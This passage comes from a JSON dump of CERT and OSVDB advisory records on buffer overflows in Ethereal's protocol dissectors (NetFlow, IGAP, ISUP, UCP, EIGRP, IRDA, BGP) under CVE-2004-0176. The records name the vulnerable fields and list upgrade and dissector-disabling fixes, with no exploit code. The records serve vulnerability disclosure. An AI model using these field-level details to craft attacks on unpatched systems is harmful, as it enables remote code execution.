disable the NetFlow protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the NetFlow protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the CFLOW (Cisco NetFlow) protocol dissector from the list by unchecking its \"Status\" checkbox \n \nHowever, it is strongly encouraged to upgrade to version 0.10.3 or later. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 24 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23644886 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 24 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 9.82\n * Document Revision: 25\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-24T00:00:00", "title": "Ethereal fails to properly parse NetFlow UDP packets with an overly large template_entry count", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:644886", "href": "https://www.kb.cert.org/vuls/id/644886", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:37:02", "references": ["http://www.ethereal.com/docs/dfref/i/igap.html", "http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal contains multiple buffer overflows in the Internet Group Membership Authentication Protocol (IGAP[](<http://www.ethereal.com/docs/dfref/i/igap.html>)) protocol dissector. These vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing IGAP data. There are two buffer overflow vulnerabilities in the way the IGAP protocol dissector decodes packets containing IGAP data. These vulnerabilities could be exploited by a remote, unauthenticated attacker by sending a specially crafted IGAP packet containing an overly long value for the `accountname` or `message`. Exploitation of these vulnerabilities could result in arbitrary code execution. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the IGAP protocol dissector by performing the following actions in Ethereal: \n \n1) Select Analyze->Enabled Protocols \n2) Disable the IGAP protocol dissector from the list by unchecking its \"Status\" checkbox \n \nHowever, it is strongly encouraged to upgrade to version 0.10.3 or later. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 24 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23864884 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting these vulnerabilities.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 24 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 9.82\n * Document Revision: 19\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-24T00:00:00", "title": "Ethereal contains multiple vulnerabilities in the IGAP protocol dissector", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:864884", "href": "https://www.kb.cert.org/vuls/id/864884", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:37:08", "references": ["http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal fails to properly decode ISDN User Part (ISUP) packets containing an overly long Interworking Function Address (IWFA) value.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing ISUP data. There is a vulnerability in the way the ISUP protocol dissector decodes the IWFA value. By sending an ISUP packet containing an overly long IWFA value, a remote, unauthenticated attacker could execute arbitrary code. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the ISUP protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the ISUP protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the ISUP protocol dissector from the list by unchecking its \"Status\" checkbox \n \nHowever, it is strongly encouraged to upgrade to version 0.10.3 or later. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 25 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23659140 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 25 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 9.82\n * Document Revision: 10\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-25T00:00:00", "title": "Ethereal ISUP protocol dissector fails to properly decode ISUP packets", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:659140", "href": "https://www.kb.cert.org/vuls/id/659140", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The UCP Dissector fails to check the boundary of the Time field resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity. This can only be exploited if the system has a MTU bigger than BUFSIZ, which may limit which platforms are susceptable.\n## Solution Description\nUpgrade to version 0.9.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The UCP Dissector fails to check the boundary of the Time field resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity. This can only be exploited if the system has a MTU bigger than BUFSIZ, which may limit which platforms are susceptable.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2001-10-08T00:00:00", "title": "Ethereal UCP Dissector Handle Time-Field Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.x", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2004-0176"], "modified": "2001-10-08T00:00:00", "id": "OSVDB:6898", "href": "https://vulners.com/osvdb/OSVDB:6898", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The EIGRP Dissector fails to check the bounds of the \"TLV_IP_EXT\" variable resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.8.14 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The EIGRP Dissector fails to check the bounds of the \"TLV_IP_EXT\" variable resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2000-11-09T00:00:00", "title": "Ethereal EIGRP Protocol TLV_IP_EXT Long IP Address Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [{"name": "Ethereal", "version": "0.8.13", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2004-0176"], "modified": "2000-11-09T00:00:00", "id": "OSVDB:6890", "href": "https://vulners.com/osvdb/OSVDB:6890", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The EIGRP Dissector fails to check the bounds of the \"TLV_IP_INT\" variable resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.8.14 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The EIGRP Dissector fails to check the bounds of the \"TLV_IP_INT\" variable resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2000-11-09T00:00:00", "title": "Ethereal EIGRP Protocol TLV_IP_INT Long IP Address Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ethereal", "version": "0.8.13", "operator": "eq"}], "cvelist": ["CVE-2004-0176"], "modified": "2000-11-09T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6889", "id": "OSVDB:6889", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The IRDA Dissector Plugin fails to check the bounds of the \"IRCOM_PORT_NAME\" variable resulting in an overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity. Due to the stacklayout, exploitation would be extremely difficult.\n## Solution Description\nUpgrade to version 0.10.1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The IRDA Dissector Plugin fails to check the bounds of the \"IRCOM_PORT_NAME\" variable resulting in an overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity. Due to the stacklayout, exploitation would be extremely difficult.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2003-12-18T00:00:00", "title": "Ethereal IRDA Dissector Plugin IRCOM_PORT_NAME Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.x", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}, {"name": "Ethereal", "version": "0.10.0a", "operator": "eq"}, {"name": "Ethereal", "version": "0.10.0", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2004-0176"], "modified": "2003-12-18T00:00:00", "id": "OSVDB:6892", "href": "https://vulners.com/osvdb/OSVDB:6892", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The UCP Dissector fails to check the boundary of a UCP Packet string resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity. This can only be exploited if the system has a MTU bigger than BUFSIZ, which may limit which platforms are susceptable.\n## Solution Description\nUpgrade to version 0.9.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The UCP Dissector fails to check the boundary of a UCP Packet string resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity. This can only be exploited if the system has a MTU bigger than BUFSIZ, which may limit which platforms are susceptable.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2001-10-08T00:00:00", "title": "Ethereal UCP Dissector Handle String-Field Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2004-0176"], "modified": "2001-10-08T00:00:00", "id": "OSVDB:6896", "href": "https://vulners.com/osvdb/OSVDB:6896", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The BGP Dissector fails to check the bounds of the IPv6 label resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity. Due to the stacklayout, exploitation would be extremely difficult.\n## Solution Description\nUpgrade to version 0.10.1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The BGP Dissector fails to check the bounds of the IPv6 label resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity. Due to the stacklayout, exploitation would be extremely difficult.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\nCIAC Advisory: o-105\nCERT VU: 119876\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2004-01-06T00:00:00", "title": "Ethereal BGP Dissector MPLS Label Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.x", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}, {"name": "Ethereal", "version": "0.10.0a", "operator": "eq"}, {"name": "Ethereal", "version": "0.10.0", "operator": "eq"}], "cvelist": ["CVE-2004-0176"], "modified": "2004-01-06T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6893", "id": "OSVDB:6893", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The UCP Dissector fails to check the boundary of the Integer field resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity. This can only be exploited if the system has a MTU bigger than BUFSIZ, which may limit which platforms are susceptable.\n## Solution Description\nUpgrade to version 0.9.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The UCP Dissector fails to check the boundary of the Integer field resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity. This can only be exploited if the system has a MTU bigger than BUFSIZ, which may limit which platforms are susceptable.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 